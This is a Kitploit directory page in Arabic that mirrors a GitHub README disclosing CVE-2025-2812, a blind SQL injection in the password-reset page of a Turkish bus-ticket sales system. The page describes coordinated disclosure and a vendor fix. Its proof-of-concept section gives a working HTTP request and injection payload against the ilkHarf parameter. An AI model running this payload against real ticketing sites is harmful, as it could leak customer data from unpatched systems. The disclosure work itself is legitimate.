Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-2812 — CVE-2025-2812 حقن SQL | Kitploit
أدوات/GitHubGitHub/sahici/cve-2025-2812
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقأمن قواعد البيانات
GitHubsahici/cve-2025-2812

CVE-2025-2812

CVE-2025-2812 حقن SQL

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

CVE-2025-2812 — ثغرة حقن SQL في "Bilet Satış Otomasyonu" من Mydata Bilişim Ltd. Şti

📌 CVE-ID: CVE-2025-2812
📢 إعلان USOM: tr-25-0099
🛡️ نوع الثغرة: CWE-89 - SQL Injection (Boolean-based Blind)
🏢 المنتج المتأثر: Bilet Satış Otomasyonu – Mydata Bilişim Ltd. Şti
🌐 مثال على عنوان URL المستهدف: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php


🔍 ملخص الثغرة

في منتج "Bilet Satış Otomasyonu"، تم اكتشاف ثغرة Boolean-based Blind SQL Injection في معامل "Adınızın ilk harfi" (ilkHarf) في صفحة إعادة تعيين كلمة المرور (SifremiUnuttum.php). تتيح هذه الثغرة تسريب بيانات من النظام دون الحاجة إلى اسم مستخدم أو كلمة مرور.

تشمل هذه الثغرة أنظمة شركات الحافلات التالية:

  • Balıkesir Uludağ
  • Kontur
  • Efe Tur
  • Kale Seyahat
  • +20 شركة

💥 PoC (Proof of Concept)

📌 طلب HTTP:

root@kitploit:~
GET /otobus-bileti/SifremiUnuttumBilgi.php?TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW HTTP/1.1
Host: otobusfirmasi.com.tr
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php
Cookie: PHPSESSID=***************

🧪 الحمولة المستخدمة:

root@kitploit:~
TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW

🧠 التفاصيل التقنية

  • المعامل الثغري: ilkHarf
  • الطريقة: Boolean-based Blind SQLi
  • نوع الثغرة: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

🙏 شكر وتقدير

بعد الثغرة التي اكتشفناها في منتج "Bilet Satış Otomasyonu" الذي طورته "Mydata Bilişim Ltd. Şti"، تم الإعلان عن هذا الخلل الأمني بالرمز CVE-2025-2812 بالتنسيق مع الشركة المصنعة وUSOM. نفخر بتقديم مساهمتنا لمجتمع الأمن السيبراني خلال هذه العملية.

عقب الإبلاغ عن الثغرة، نفذت Mydata Bilişim Ltd. Şti جميع الإجراءات اللازمة بسرعة، وأغلقت الثغرة الأمنية ذات الصلة ودمجت إجراءات أمنية إضافية في أنظمتها. نشكرهم على الشفافية والتعاون والوعي بالمسؤولية التي أظهروها خلال هذه العملية.

نفخر بتقديم مساهمتنا لمجتمع الأمن السيبراني خلال هذه العملية.


📬 التواصل

يمكنك التواصل معي لأي سؤال أو ملاحظات أو تعاون:

  • 📧 البريد الإلكتروني: [email protected]
  • 📷 Instagram: @yyasar.yasin
تنزيل الأداة